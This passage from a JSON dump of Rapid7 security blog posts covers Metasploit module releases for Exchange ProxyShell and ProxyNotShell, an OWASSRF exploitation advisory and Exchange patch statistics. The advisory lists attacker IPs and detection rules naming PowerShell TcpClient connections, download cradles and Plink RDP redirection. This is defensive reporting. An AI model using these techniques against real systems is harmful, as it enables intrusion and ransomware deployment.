exploit also added new Exchange SSRF functionality that allows both it and the previous ProxyShell module to target Exchange server instances which utilize a Data Access Group (DAG) backend. The Metasploit team has yet to see another public Proof of Concept that takes this configuration type into account.\n\n## Remote Control Collection RCE\n\nCommunity contributors [h00die](<https://github.com/h00die>) and [H4rk3nz0](<https://github.com/H4rk3nz0>) also introduced another exploit module in this week's release. This module targets the remote control software which allows a remote person to connect and execute screen commands via mobile devices. Note that this module will only deploy a payload if the server is set without a password (default). A side note, if you're looking to learn more about how you can use metasploit to hack target servers using remote code vulnerabilities, you might find this video (<https://www.youtube.com/watch?v=eLbBR956Tgw>) helpful.\n\n## New module content (2)\n\n * [Microsoft Exchange ProxyNotShell RCE](<https://github.com/rapid7/metasploit-framework/pull/17275>) by DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q, Orange Tsai, Piotr Bazyd\u0142o, Rich Warren, Soroush Dalili, and Spencer McIntyre, which exploits [CVE-2022-41082](<https://attackerkb.com/topics/tzpl7qr8m1/cve-2022-41082?referrer=blog>) \\- This adds an exploit module for `CVE-2022-41082`, AKA ProxyNotShell. This vulnerability is a deserialization flaw in Microsoft Exchange's PSRP backend. The PSRP backend can be accessed by an authenticated attacker leveraging the SSRF flaw identified as `GHSA-6ph7-8wxv-6gf2`. Together, these vulnerabilities allow an authenticated attacker to execute arbitrary commands on a Microsoft Exchange Server.\n * [Remote Control Collection RCE](<https://github.com/rapid7/metasploit-framework/pull/17087>) by H4rk3nz0 and h00die - This PR adds an exploit targeting the Remote Control Server software which allows remote control of a PC, now including running a payload.\n\n## Enhancements and features (1)\n\n * [#17304](<https://github.com/rapid7/metasploit-framework/pull/17304>) from [om3rcitak](<https://github.com/om3rcitak>) \\- Improves `auxiliary/scanner/http/tomcat_mgr_login.rb` error message on 401 status codes to include the user defined URI.\n\n## Bugs fixed (2)\n\n * [#17163](<https://github.com/rapid7/metasploit-framework/pull/17163>) from [jheysel-r7](<https://github.com/jheysel-r7>) \\- This fixes a bug in the check method where we left an artifact on disk.\n * [#17299](<https://github.com/rapid7/metasploit-framework/pull/17299>) from [smashery](<https://github.com/smashery>) \\- This fixes a bug in the `polkit_dbus_auth_bypass` module that prevented it from working with certain session types.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.28...6.2.29](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-11-24T10%3A30%3A44%2B00%3A00..2022-12-01T09%3A50%3A22-06%3A00%22>)\n * [Full diff 6.2.28...6.2.29](<https://github.com/rapid7/metasploit-framework/compare/6.2.28...6.2.29>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-02T21:00:13", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-12-02T21:00:13", "id": "RAPID7BLOG:0451F386C3F603C8DC3AE2E3F42A90D1", "href": "https://blog.rapid7.com/2022/12/02/metasploit-weekly-wrap-up-186/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-22T00:09:55", "description": "\n\n_Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too._\n\nBeginning December 20, 2022, Rapid7 has responded to an increase in the number of Microsoft Exchange server compromises. Further investigation aligned these attacks to what CrowdStrike is reporting as \u201c[OWASSRF](<https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/>)\u201d, a chaining of CVE-2022-41080 and CVE-2022-41082 to bypass URL rewrite mitigations that Microsoft provided for [ProxyNotShell](<https://www.rapid7.com/blog/post/2022/09/29/suspected-post-authentication-zero-day-vulnerabilities-in-microsoft-exchange-server/>) allowing for remote code execution (RCE) via privilege escalation via Outlook Web Access (OWA).\n\n**Patched servers do not appear vulnerable, servers only utilizing Microsoft\u2019s mitigations do appear vulnerable.**\n\nThreat actors are using this to deploy ransomware.\n\n**Rapid7 recommends that organizations who have yet to install the Exchange update (KB5019758) from November 2022 should do so immediately and investigate systems for indicators of compromise. Do not rely on the rewrite mitigations for protection.**\n\n## Affected Products\n\nThe following on-prem versions of Exchange that have not applied the November 8, 2022 [KB5019758](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-8-2022-kb5019758-2b3b039b-68b9-4f35-9064-6b286f495b1d>) update are vulnerable:\n\n * Microsoft Exchange Server 2013\n * Microsoft Exchange Server 2016\n * Microsoft Exchange Server 2019\n\n## IOCs\n\nIn addition to the detection rules included in InsightIDR for Rapid7 customers, other IOCs include:\n\n * PowerShell spawned by IIS ('w3wp.exe') creating outbound network connections\n * `45.76.141[.]84`\n * `45.76.143[.]143`\n\nExample command being spawned by IIS (w3wp.exe):\n\n\n\nDecoded command where the highlighted string (0x2d4c8f8f) is the hex representation of the IP address 45.76.143[.]143\n\n\n\nRapid7 has evidence of exploitation in the wild as far back as December 1, 2022.\n\n## Rapid7 Customers\n\nCustomers already have coverage to assist in assessing exposure to and detecting exploitation of this threat.\n\n### InsightVM and Nexpose\n\nInsightVM and Nexpose added checks for CVE-2022-41080 and CVE-2022-41082 on November 8, 2022.\n\n### InsightIDR\n\nInsightIDR customers can look for the alerting of the following rules, typically seeing several (or all) triggered on a single executed command:\n\n * Attacker Technique - PowerShell Registry Cradle\n * Suspicious Process - PowerShell System.Net.Sockets.TcpClient\n * Suspicious Process - Exchange Server Spawns Process\n * PowerShell - Obfuscated Script\n * Webshell - IIS Spawns PowerShell\n\nAdditional detections currently being observed with follow-on activity in these compromises include:\n\n * Attacker Technique - Plink Redirecting RDP\n * Attacker Technique - Renamed Plink\n * Suspicious Process - Started From Users Music Directory\n\n### Managed Detection & Response customers\n\nYour customer advisor will reach out to you right away if any suspicious activity is observed in your organization.\n\n_Eoin Miller contributed to this article._\n\n## Updates\n\n12/21/22 4PM ET: Updated IOC with EITW information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T17:35:17", "type": "rapid7blog", "title": "CVE-2022-41080, CVE-2022-41082: Rapid7 Observed Exploitation of `OWASSRF` in Exchange for RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41080", "CVE-2022-41082"], "modified": "2022-12-21T17:35:17", "id": "RAPID7BLOG:4F13870ACE30DEDD995C2DDE4E4FF4D0", "href": "https://blog.rapid7.com/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-09T20:11:17", "description": "\n\n2022 began on a solemn note \u2014 many organizations across the globe were recovering from the [Log4Shell zero-day vulnerability](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>). For the InsightVM and Nexpose team, 2022 began with a lot of introspection on how we can add more value and keep meeting our customer needs in the best possible ways. This means we continue to prioritize what really matters, even if it means making some hard decisions, and further improve communication with our customers.\n\nOver the course of 2022, we launched many new features and improvements \u2014 some highly anticipated, many customer-requested. Log4j was difficult but we learnt from it to be quicker and better with our emergent threat response. [Rapid7 recently refreshed our coordinated vulnerability disclosure (CVD) policy and philosophy](<https://www.rapid7.com/blog/post/2022/12/28/refreshing-rapid7s-coordinated-vulnerability-disclosure-policy/>). As we ran into more edgy kinds of vulnerabilities, we learnt that we couldn't treat them all as equal and there is a need to be more agile with our CVD approach. So we came up with six classes of vulnerabilities (and a meta-classification of \"more than one\") and some broad strokes of what we intend to accomplish with our CVD for each of them.\n\nWe reimagined many of our internal processes and teams to drive better customer outcomes. For instance, we are making a significant investment in re-architecting the InsightVM/Nexpose database to ensure VM programs scale with the customers evolving IT environment.\n\nHere\u2019s a snapshot of 2022 in InsightVM:\n\n### Key Product Improvements\n\n****Agent-based policy**** ****assessment****\n\nA robust vulnerability management program should assess IT assets for misconfigurations along with vulnerabilities. That's why we were thrilled to introduce [Agent-Based Policy in InsightVM](<https://docs.rapid7.com/insightvm/assess-with-agent-based-policies/>). Customers can now use Insight Agents to conduct configuration assessments of IT assets against widely used industry benchmarks from the Center for Internet Security (CIS) and the U.S. Defense Information Systems Agency (DISA) to help prevent breaches and ensure compliance.\n\n\n\n**Remediation Project improvements**\n\nRemediation Projects help security teams collaborate and track progress of remediation work (often assigned to their IT ops counterparts). [Here are our favorite updates](<https://www.rapid7.com/blog/post/2022/07/14/insightvm-release-update-lets-focus-on-remediation-for-just-a-minute/>):\n\n * ****Remediator Export -**** a new solution-based CSV export option, Remediator Export contains detailed information about the assets, vulnerabilities, proof data, and more for a given solution.\n * ****Better way to track project progress -**** The new metric that calculates progress for Remediation Projects will advance for each individual asset remediated within a \u201csolution\" group. This means customers no longer have to wait for all the affected assets to be remediated to see progress.\n\n\n****Scan Assistant****\n\n[Scan Assistant](<https://www.rapid7.com/globalassets/_pdfs/product-and-service-briefs/extend_vulnerability_coverage_scan_assistant.pdf>) provides an innovative alternative to traditional credentialed scanning. Instead of account-based credentials, it uses digital certificates, which increases security and simplifies administration for authenticated scans.\n\n * ****Scan Assistant is now generally available for Linux****\n * ****Automatic Scan Assistant credential generation -**** taking some more burden off the vulnerability management teams, customers can use the Shared Credentials management UI to automatically generate Scan Assistant credentials\n * ****Improved scalability -**** automated Scan Assistant software updates and digital certificate rotation for customers seeking to deploy and maintain a fleet of Scan Assistants.\n\n**Dashboards and reports**\n\nCustomers like to use dashboards to visualize the impact of a specific vulnerability or vulnerabilities to their environment, and we made quite a few updates in that area:\n\n * ****New dashboard cards based on CVSS v3 severity -**** we [expanded CVSS dashboard cards](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>) to include a version that sorts the vulnerabilities based on CVSS v3 scores (along with CVSS v2 scores).\n * ****Threat feed dashboard includes CISA's KEV catalog -**** we extended the scope of vulnerabilities tracked to [incorporate CISA's KEV catalog](<https://www.rapid7.com/blog/post/2022/04/19/whats-new-in-insightvm-and-nexpose-q1-2022-in-review/>) in the InsightVM Threat Feed Dashboard to help customers prioritize faster.\n * ****5 New Dashboard Cards -**** We launched a set of five new dashboard cards that utilize line charts to show trends in vulnerability severity and allow for easy comparison when reporting.\n * ****Distribute Reports via Email -**** Customers can now send InsightVM reports to their teammates through email.\n\n\n**Agent improvements for virtual desktops**\n\nPandemic fueled remote work and with it the use of virtual desktops. InsightVM can now identify [agent-based assets that are Citrix VDI](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>) instances and correlate them to the user, enabling more accurate asset/instance tagging. This will create a smooth, streamlined experience for organizations that deploy and scan Citrix VDIs. Expect similar improvements for VMware Horizon VDIs in 2023.\n\n**Improved support**\n\nA new, opt-in feature eliminates the need for customers to attach logs to support cases and/or send logs manually, ensuring a faster, more intuitive support process.\n\n### Notable Emergent Threat Responses and Recurring Coverages\n\nIn 2022, we added support for enterprise systems like Windows Server 2022, AlmaLinux, VMware Horizon (server and client), and more to the recurring coverage list. Learn about the systems with [recurring coverage](<https://docs.rapid7.com/insightvm/recurring-vulnerability-coverage/>).\n\nRapid7's Emergent Threat Response (ETR) program is part of an ongoing process to deliver fast, expert analysis alongside first-rate security content for the highest-priority security threats. This year we flagged a number of critical vulnerabilities. To list a few:\n\n * [Microsoft Exchange Server Server-Side Request Forgery](<https://www.rapid7.com/blog/post/2022/09/29/suspected-post-authentication-zero-day-vulnerabilities-in-microsoft-exchange-server/>) and Remote Code Execution (CVE-2022-41040 and CVE-2022-41082)\n * [OpenSSL Buffer Overflows](<https://www.rapid7.com/blog/post/2022/11/01/cve-2022-3786-and-cve-2022-3602-two-high-severity-buffer-overflows-in-openssl-fixed/>) (CVE-2022-3786 and CVE-2022-3602)\n * [Confluence Server and Data Center Unauthenticated Remote Code Execution](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>) (CVE-2022-26134)\n * [Fortinet FortiOS Authentication Bypass](<https://www.rapid7.com/blog/post/2022/10/07/cve-2022-40684-remote-authentication-bypass-vulnerability-in-fortinet-firewalls-web-proxies/>) (FortiGate, FortiProxy, FortiSwitch Manager) (CVE-2022-40684)\n\nThat's not all. We added over 21,000 new checks across close to 9000 CVEs to help customers understand their risk better and thus secure better.\n\nCheck out our past blogs - [Q1](<https://www.rapid7.com/blog/post/2022/04/19/whats-new-in-insightvm-and-nexpose-q1-2022-in-review/>), [Q2](<https://www.rapid7.com/blog/post/2022/07/28/whats-new-in-insightvm-and-nexpose-q2-2022-in-review/>), and [Q3](<https://www.rapid7.com/blog/post/2022/09/28/whats-new-in-insightvm-and-nexpose-q3-2022-in-review/>) \\- to get more information on product improvements and key vulnerability coverages.\n\n### Customer Stories and Resources\n\nThe past year, we had the privilege to share stories of how our customers are using Insight VM to secure their environment. [Check out how your peers are leveraging InsightVM](<https://www.rapid7.com/customers/customer-stories/?page=1&p=InsightVM>).Here's what one customer had to say:\n\n### \u201cThat is one of the things we value most about InsightVM; it has the capacity to pinpoint actively-exploited vulnerabilities, so we can prioritize and direct our attention where it's needed most.\" - _[Daniel Hernandez, Information Security Analyst III at Pioneer Telephone Cooperative, Inc](<https://www.rapid7.com/customers/pioneer-telephone-cooperative/>)._\n\nFor customers looking to improve the utilization of the Vulnerability Management tool, check out this webcast series that covers the different phases of VM lifecycle - [Discovery](<https://academy.rapid7.com/path/insightvm-deep-dive-webcasts/insightvm-customer-webcast-vulnerability-management-lifecycle-discovery>), [Analyze](<https://academy.rapid7.com/path/insightvm-deep-dive-webcasts/vulnerability-management-lifecycle-analyze>), [Communicate](<https://academy.rapid7.com/path/insightvm-deep-dive-webcasts/vulnerability-management-lifecycle-communicate>), and [Remediate](<https://academy.rapid7.com/path/insightvm-deep-dive-webcasts/vulnerability-management-lifecycle-remediate>). Lastly, customers can always leverage [Rapid7 Academy to participate in workshops](<https://academy.rapid7.com/page/product-workshops#rapid7-product_insightvm>) and training to continue their learning journey.\n\n### Looking forward to 2023\n\nWe will maintain the customer-centricity in 2023 as we continue to deliver features and improvements in customers' best interests. We will be holding a [webinar](<https://information.rapid7.com/agent-based-policy-webinar-register.html>) on January 24 around configuration assessment in InsightVM agent-based policy. And, as always, be on the lookout for our annual vulnerability intelligence report coming soon to a Q1 near you ([here's last year's](<https://www.rapid7.com/info/2021-vulnerability-intelligence-report/>))!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-01-09T17:00:00", "type": "rapid7blog", "title": "Year in Review: Rapid7 Vulnerability Management", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-26134", "CVE-2022-3602", "CVE-2022-3786", "CVE-2022-40684", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2023-01-09T17:00:00", "id": "RAPID7BLOG:6F833E0DB9E152EB8397D33430FECB7F", "href": "https://blog.rapid7.com/2023/01/09/year-in-review-vulnerability-management/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-06T15:02:24", "description": "\n\nIf you've been keeping tabs on the state of vulnerabilities, you've probably noticed that Microsoft Exchange has been in the news more than usual lately. Back in March 2021, Microsoft [acknowledged a series of threats](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) exploiting zero-day CVEs in on-premises instances of Exchange Server. Since then, several related exploit chains targeting Exchange have [continued to be exploited in the wild](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>).\n\nMicrosoft [quickly](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) [released](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) [patches](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>) to help security teams keep attackers out of their Exchange environments. So, what does the state of patching look like today among organizations running impacted instances of Exchange?\n\nThe answer is more mixed \u2014 and more troubling \u2014 than you'd expect.\n\n## What is Exchange, and why should you care?\n\nExchange is a popular email and messaging service that runs on Windows Server operating systems, providing email and calendaring services to tens of thousands of organizations. It also integrates with unified messaging, video chat, and phone services. That makes Exchange an all-in-one messaging service that can handle virtually all communication streams for an enterprise customer.\n\nAn organization's Exchange infrastructure can contain copious amounts of sensitive business and customer information in the form of emails and a type of shared mailbox called Public Folders. This is one of the reasons why Exchange Server vulnerabilities pose such a significant threat. Once compromised, Exchange's search mechanisms can make this data easy to find for attackers, and a robust rules engine means attackers can create hard-to-find automation that forwards data out of the organization.\n\nAn attacker who manages to get into an organization's Exchange Server could gain visibility into their Active Directory or even compromise it. They could also steal credentials and impersonate an authentic user, making phishing and other attempts at fraud more likely to land with targeted victims.\n\n## Sizing up the threats\n\nThe credit for discovering this recent family of Exchange Server vulnerabilities goes primarily to security researcher Orange Tsai, who overviewed them in an August 2021 [Black Hat talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>). He cited 8 vulnerabilities, which resulted in 3 exploit chains:\n\n * ****ProxyLogon:**** This vulnerability could allow attackers to use pre-authentication server-side request forgery (SSRF) plus a post-authentication arbitrary file write, resulting in remote code execution (RCE) on the server.\n * ****ProxyOracle:**** With a cookie from an authenticated user (obtained through a reflected XSS link), a Padding Oracle attack could provide an intruder with plain-text credentials for the user.\n * ****ProxyShell: ****Using a pre-authentication access control list (ACL) bypass, a PrivEsc (not going up to become an administrator but down to a user mailbox), and a post-authentication arbitrary file write, this exploit chain could allow attackers to execute an RCE attack.\n\nGiven the sensitivity of Exchange Server data and the availability of [patches and resources from Microsoft](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) to help defend against these threats, you'd think adoption of these patches would be almost universal. But unfortunately, the picture of patching for this family of vulnerabilities is still woefully incomplete.\n\n## A patchwork of patch statuses\n\nIn Rapid7's OCTO team, we keep tabs on the exposure for major vulnerabilities like these, to keep our customers and the security community apprised of where these threats stand and if they might be at risk. To get a good look at the patch status among Exchange Servers for this family of attack chains, we had to develop new techniques for fingerprinting Exchange versions so we could determine which specific hotfixes had been applied.\n\nWith a few tweaks, we were able to adjust our measurement approach to get a clear enough view that we can draw some strong conclusions about the patch statuses of Exchange Servers on the public-facing internet. Here's what we found:\n\n * Out of the 306,552 Exchange OWA servers we observed, 222,145 \u2014 or 72.4% \u2014were running an impacted version of Exchange (this includes 2013, 2016, and 2019).\n * Of the impacted servers, 29.08% were still unpatched for the ProxyShell vulnerability, and 2.62% were partially patched. That makes 31.7% of servers that may still be vulnerable.\n\n\n\nTo put it another, starker way: 6 months after patches have been available for the ProxyLogon family of vulnerabilities, 1 in 3 impacted Exchange Servers are still susceptible to attacks using the ProxyShell method.\n\nWhen we sort this data by the Exchange Server versions that organizations are using, we see the uncertainty in patch status tends to cluster around specific versions, particularly 2013 Cumulative Update 23. \n\n\n\nWe also pulled the server header for these instances with the goal of using the version of IIS as a proxy indicator of what OS the servers may be running \u2014 and we found an alarmingly large proportion of instances that were running end-of-life servers and/or operating systems, for which Microsoft no longer issues patch updates.\n\n\n\nThat group includes the two bars on the left of this graph, which represent 2007 and 2010 Exchange Server versions: 75,300 instances of 2010 and 8,648 instances of 2007 are still running out there on the internet, roughly 27% of all instances we observed. Organizations still operating these products can count themselves lucky that ProxyShell and ProxyLogon don't impact these older versions of Exchange (as far as we know). But that doesn't mean those companies are out of the woods \u2014 if you still haven't replaced Exchange Server 2010, you're probably also doing other risky things in your environment.\n\nLooking ahead, the next group of products that will go end-of-life are the Windows Server 2012 and 2012 R2 operating systems, represented in green and yellow, respectively, within the graph. That means 92,641 instances of Exchange \u2014 nearly a third of all Exchange Servers on the internet \u2014 will be running unsupported operating systems for which Microsoft isn't obligated to provide security fixes after they go end-of-life in 2023.\n\n## What you can do now\n\nIt's a matter of when, not if, we encounter the next family of vulnerabilities that lets attackers have a field day with huge sets of sensitive data like those contained in Exchange Servers. And for companies that haven't yet patched, ProxyShell and its related attack chains are still a real threat. Here's what you can do now to proactively mitigate these vulnerabilities.\n\n * First things first: If your organization is running one of the 1 in 3 affected instances that are vulnerable due to being unpatched, [install the appropriate patch](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) right away.\n * Stay current with patch updates as a routine priority. It is possible to build Exchange environments with near-100% uptimes, so there isn't much argument to be made for foregoing critical patches in order to prevent production interruptions.\n * If you're running a version of Exchange Server or Windows OS that will soon go end-of-life, start planning for how you'll update to products that Microsoft will continue to support with patches. This way, you'll be able to quickly and efficiently mitigate vulnerabilities that arise, before attackers take advantage of them.\n\nIf you're already a Rapid7 customer, there's good news: [InsightVM](<https://www.rapid7.com/products/insightvm/>) already has authenticated scans to detect these vulnerabilities, so users of the product should already have a good sense of where their Exchange environments stand. On the offensive side, your red teams and penetration testers can highlight the risk of running vulnerable Exchange instances with modules exercising [ProxyLogon](<https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxylogon_rce/>) and [ProxyShell](<https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/>). And as our research team continues to develop techniques for getting this kind of detailed information about exposures, we ensure our products know about those methods so they can more effectively help customers understand their vulnerabilities.\n\nBut for all of us, these vulnerabilities are a reminder that security requires a proactive mindset \u2014 and failing to cover the basics like upgrading to supported products and installing security updates leaves organizations at risk when a particularly thorny set of attack chains rears its head.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T14:07:12", "type": "rapid7blog", "title": "For Microsoft Exchange Server Vulnerabilities, Patching Remains Patchy", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-06T14:07:12", "id": "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720", "href": "https://blog.rapid7.com/2021/10/06/for-microsoft-exchange-server-vulnerabilities-patching-remains-patchy/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-20T20:19:12", "description": "## Anyone enjoy making chains?\n\n\n\nThe community is hard at work building chains to pull sessions out of vulnerable Exchange servers. This week Rapid7's own [wvu](<https://github.com/wvu-r7>) & [Spencer McIntyre](<https://github.com/zeroSteiner>) added a module that implements the ProxyShell exploit chain originally demonstrated by [Orange Tsai](<https://twitter.com/orange_8361>). The module also benefited from research and analysis by [Jang](<https://twitter.com/testanull>), [PeterJson](<https://twitter.com/peterjson>), [brandonshi123](<https://github.com/brandonshiyay>), and [mekhalleh (RAMELLA S\u00e9bastien)](<https://twitter.com/Mekhalleh>) to make it as simple as finding an email for an administrator of vulnerable version of exchange as the entrypoint to chain [CVE-2021-31207](<https://attackerkb.com/topics/5F0CGZWw61/cve-2021-31207?referrer=blog>), [CVE-2021-34523](<https://attackerkb.com/topics/RY7LpTmyCj/cve-2021-34523?referrer=blog>), & [CVE-2021-34473](<https://attackerkb.com/topics/pUK1MXLZkW/cve-2021-34473?referrer=blog>) into sessions for everyone to enjoy.\n\n## Great to see some GSoC value in the wild.\n\nWith Google Summer of Code 2021 moving into its final phases, [pingport80](<https://github.com/pingport80>) had 4 PRs land in this week's release. These improvements and fixes to interactions with sessions make post exploitation tasks more accessible, bringing the community more capabilities and stability along the way.\n\n## New module content (2)\n\n * [Lucee Administrator imgProcess.cfm Arbitrary File Write](<https://github.com/rapid7/metasploit-framework/pull/15525>) by [wvu](<https://github.com/wvu-r7>),, [iamnoooob](<https://github.com/iamnoooob>), and [rootxharsh](<https://github.com/rootxharsh>), which exploits [CVE-2021-21307](<https://attackerkb.com/topics/16OOl6KSdo/cve-2021-21307?referrer=blog>) \\- An unauthenticated user is permitted to make requests through the `imgProcess.cfm` endpoint, and using the `file` parameter which contains a directory traversal vulnerability, they can write a file to an arbitrary location. Combining the two capabilities, this module writes a CFML script to the vulnerable server and achieves unauthenticated code execution as the user running the Lucee server.\n * [Microsoft Exchange ProxyShell RCE](<https://github.com/rapid7/metasploit-framework/pull/15561>) by [wvu](<https://github.com/wvu-r7>), [Jang](<https://twitter.com/testanull>), [Orange Tsai](<https://twitter.com/orange_8361>), [PeterJson](<https://twitter.com/peterjson>), [Spencer McIntyre](<https://github.com/zeroSteiner>), [brandonshi123](<https://github.com/brandonshiyay>), and [mekhalleh (RAMELLA S\u00e9bastien)](<https://twitter.com/Mekhalleh>), which exploits [CVE-2021-31207](<https://attackerkb.com/topics/5F0CGZWw61/cve-2021-31207?referrer=blog>) \\- Added an exploit for the ProxyShell attack chain against Microsoft Exchange Server.\n\n## Enhancements and features\n\n * [#15540](<https://github.com/rapid7/metasploit-framework/pull/15540>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This adds an option to `cmd_execute` to have the command run in a subshell by Meterpreter.\n * [#15556](<https://github.com/rapid7/metasploit-framework/pull/15556>) from [pingport80](<https://github.com/pingport80>) \\- This adds shell session compatibility to the `post/windows/gather/enum_unattend` module.\n * [#15564](<https://github.com/rapid7/metasploit-framework/pull/15564>) from [pingport80](<https://github.com/pingport80>) \\- This adds support to the `get_env` and `command_exists?` post API methods for Powershell session types.\n\n## Bugs fixed\n\n * [#15303](<https://github.com/rapid7/metasploit-framework/pull/15303>) from [pingport80](<https://github.com/pingport80>) \\- This PR ensures that the shell `dir` command returns a list.\n * [#15332](<https://github.com/rapid7/metasploit-framework/pull/15332>) from [pingport80](<https://github.com/pingport80>) \\- This improves localization support and compatibly in the session post API related to the `rename_file` method.\n * [#15539](<https://github.com/rapid7/metasploit-framework/pull/15539>) from [tomadimitrie](<https://github.com/tomadimitrie>) \\- This improves the OS version in the `check` method of `exploit/windows/local/cve_2018_8453_win32k_priv_esc`.\n * [#15546](<https://github.com/rapid7/metasploit-framework/pull/15546>) from [timwr](<https://github.com/timwr>) \\- This ensures that the UUID URLs of stageless reverse_http(s) payloads are stored in the database so that they can be properly tracked with payload UUID tracking. This also fixes an error caused by accessing contents of a url list without checking if it's valid first.\n * [#15570](<https://github.com/rapid7/metasploit-framework/pull/15570>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a bug in the `auxiliary/scanner/smb/smb_enum_gpp` module where the path that was being generated by the module caused an SMB exception to be raised.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 